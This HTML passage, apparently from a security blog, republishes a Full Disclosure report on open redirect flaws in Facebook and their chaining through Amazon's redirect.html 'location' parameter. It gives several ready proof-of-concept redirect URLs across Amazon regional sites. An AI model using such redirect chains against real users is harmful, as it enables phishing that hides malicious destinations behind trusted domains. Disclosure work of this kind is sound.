QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.stackoverflow.com%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFBnoQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphkOFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be">https://www.youtube.com/watch?v=VvhmxfKt85Q&feature=youtu.be</a></span></div>
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html">http://securityrelated.blogspot.com/2015/01/facebook-old-generated-urls-still.html</a></span><br />
<div>
</div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<br />
<div>
</div>
<br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Those vulnerabilities were reported to Facebook in 2014 and they have been patched.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. Facebook has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" All the fllowing web securities have been published here, Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. Large number of Facebook bugs were published here. FD also publishes suggestions, advisories, solutions details related to Open Redirect vulnerabilities and cyber intelligence recommendations.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) </b><b>Amazon Covert Redirect Security Vulnerability Based on Facebook </b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Since Facebook is trusted by large numbers of other websites. Those vulnerabilities can be used to do "<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>" to other websites such as Amazon.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Domain: </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.com/">http://www.amazon.com</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"American electronic commerce company with headquarters in Seattle, Washington. It is the largest Internet-based retailer in the United States. Amazon.com started as an online bookstore, but soon diversified, selling DVDs, Blu-rays, CDs, video downloads/streaming, MP3 downloads/streaming, software, video games, electronics, apparel, furniture, food, toys and jewelry. The company also produces consumer electronics—notably, Amazon Kindle e-book readers, Fire tablets, Fire TV and Fire Phone — and is a major provider of cloud computing services. Amazon also sells certain low-end products like USB cables under its inhouse brand AmazonBasics. Amazon has separate retail websites for United States, United Kingdom & Ireland, France, Canada, Germany, The Netherlands, Italy, Spain, Australia, Brazil, Japan, China, India and Mexico. Amazon also offers international shipping to certain other countries for some of its products. In 2011, it had professed an intention to launch its websites in Poland and Sweden." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability exists at "redirect.html?" page with "&location" parameter, e.g.</span></div>
<div>
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.google.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>google.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>More Details:</b></span></div>
<div>
<a href="http://tetraph.com/covert_redirect/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/covert_<wbr></wbr>redirect/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html" target="_blank">http://tetraph.com/covert_<wbr></wbr>redirect/oauth2_openid_covert_<wbr></wbr>redirect.html</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.1)</b> When a user is redirected from Amazon to another site, Amazon will check parameters "&token". If the redirected URL's domain is OK, Amazon will allow the reidrection.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">However, if the URLs in a redirected domain have open URL redirection vulnerabilities themselves, a user could be redirected from Amazon to a vulnerable URL in that domain first and later be redirected from this vulnerable site to a malicious site. This is as if being redirected from Amazon directly.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">One of the vulnerable domain is,</span></div>
<div>
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4.2)</b> Use one of webpages for the following tests. The webpage address is "<a href="http://www.inzeed.com/kaleidoscope" target="_blank">http://www.inzeed.com/<wbr></wbr>kaleidoscope</a>". Suppose it is malicious.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
<div>
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Famazon%3Fv%3Dapp_165157536856903&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Famazon%3Fv%<wbr></wbr>3Dapp_165157536856903&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
<div>
<a href="http://www.amazon.com/gp/redirect.html?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.inzeed.com%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.com/gp/<wbr></wbr>redirect.html?_encoding=UTF8&<wbr></wbr>location=http%3A%2F%2Fwww.<wbr></wbr>facebook.com%2Fl.php%3Fu%<wbr></wbr>3Dhttp%253A%252F%252Fwww.<wbr></wbr>inzeed.com%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.amazon.de/gp/redirect.html/ref=cm_sw_cl_fa_dp_1bI9sb0R0MNZH?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.nicovideo.jp%20%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1">http://www.amazon.de/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_1bI9sb0R0MNZH?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>nicovideo.jp%26h%3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.amazon.co.uk/gp/redirect.html/ref=cm_sw_cl_fa_dp_Zzbbtb04XETQB?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.bbc.co.uk%26h%3D7AQFwCeYDAQEZsz_cx9BJKCE5Af7KKocYw4jOlGk5TB5kZg&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.co.uk/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_Zzbbtb04XETQB?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>bbc.co.uk%26h%<wbr></wbr>3D7AQFwCeYDAQEZsz_<wbr></wbr>cx9BJKCE5Af7KKocYw4jOlGk5TB5kZ<wbr></wbr>g&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.amazon.ca/gp/redirect.html/ref=cm_sw_cl_fa_dp_G7uctb099ZX2N?_encoding=UTF8&location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fgoogleadservices.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.amazon.ca/gp/<wbr></wbr>redirect.html/ref=cm_sw_cl_fa_<wbr></wbr>dp_G7uctb099ZX2N?_encoding=<wbr></wbr>UTF8&location=http%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%<wbr></wbr>252Fgoogleadservices.com%26h%<wbr></wbr>3D_AQHylR65AQG3dZfbwarP74zIO_<wbr></wbr>Gj_ndx4h1QB1r7qbJx4Q&token=<wbr></wbr>6BD0FB927CC51E76FF446584B1040F<wbr></wbr>70EA7E88E1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="https://www.amazon.co.jp/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.pornhub.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.co.jp/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>pornhub.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="https://www.amazon.fr/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.naver.com%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.fr/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>naver.com%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="https://www.amazon.it/gp/redirect.html/ref=amb_link_64307649_2?location=http%3A%2F%2Fwww.facebook.com%2Fl.php%3Fu%3Dhttp%253A%252F%252Fwww.craigslist.org%26h%3D_AQHylR65AQG3dZfbwarP74zIO_Gj_ndx4h1QB1r7qbJx4Q&pf_rd_m=AN1VRQENFRJN5&pf_rd_s=left-2&pf_rd_r=15EZARSP2Q0PG0JW0ZB0&pf_rd_t=101&pf_rd_p=122450949&pf_rd_i=2221688051" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.amazon.it/gp/<wbr></wbr>redirect.html/ref=amb_link_<wbr></wbr>64307649_2?location=http%3A%<wbr></wbr>2F%2Fwww.facebook.com%2Fl.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>craigslist.org%26h%3D_<wbr></wbr>AQHylR65AQG3dZfbwarP74zIO_Gj_<wbr></wbr>ndx4h1QB1r7qbJx4Q&pf_rd_m=<wbr></wbr>AN1VRQENFRJN5&pf_rd_s=left-2&<wbr></wbr>pf_rd_r=15EZARSP2Q0PG0JW0ZB0&<wbr></wbr>pf_rd_t=101&pf_rd_p=122450949&<wbr></wbr>pf_rd_i=2221688051</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<a href="https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=ss3ALnvU63w&feature=youtu.be</span></a></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<a href="https://www.youtube.com/watch?v=f4W63YXnbIk"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=f4W63YXnbIk</span></a></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Blog Details:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html">http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-security.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Related Articles:</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2015/Jan/22">http://seclists.org/fulldisclosure/2015/Jan/22</a></span><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1428</span></a><br />
<a href="http://lists.openwall.net/full-disclosure/2015/01/12/1"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/01/12/1</span></a><br />
<a href="http://marc.info/?l=full-disclosure&m=142104333521454&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142104333521454&w=4</span></a><br />
<a href="http://diebiyi.com/articles/security/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/facebook-open-redirect/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/essaybeans/posts/570476126427191">https://www.facebook.com/essaybeans/posts/570476126427191</a></span><br />
<a href="http://germancast.blogspot.de/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://germancast.blogspot.de/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a><br />
<a href="https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://essaybeans.lofter.com/post/1cc77d20_7300027" target="_blank">http://essaybeans.lofter.com/<wbr></wbr>post/1cc77d20_7300027</a></span><br />
<div>
<a href="http://qianqiuxue.tumblr.com/post/120750458855/itinfotech-facebook-web-security-0day-bug" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://qianqiuxue.tumblr.com/<wbr></wbr>post/120750458855/itinfotech-<wbr></wbr>facebook-web-security-0day-bug</span></a></div>
<a href="https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/permalink.php?story_fbid=472994806188548&id=405943696226993</span></a><br />
<a href="https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://mathfas.wordpress.com/2015/01/11/facebook-open-redirect/</span></a><br />
<a href="http://www.tetraph.com/blog/phishing/facebook-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/blog/phishing/facebook-open-redirect/</span></a></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120750347586/facebook-web-security-0day-bug" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120750347586/facebook-<wbr></wbr>web-security-0day-bug</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_72fd108" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_72fd108</a></span></div>
<div>
<a href="http://russiapost.blogspot.ru/2015/06/facebook-web-security-0day-bug.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://russiapost.blogspot.ru/<wbr></wbr>2015/06/facebook-web-security-<wbr></wbr>0day-bug.html</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/tetraphibious/status/606676645265567744" target="_blank">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606676645265567744</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/hb6seddG561" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>hb6seddG561</a></span></div>
<div>
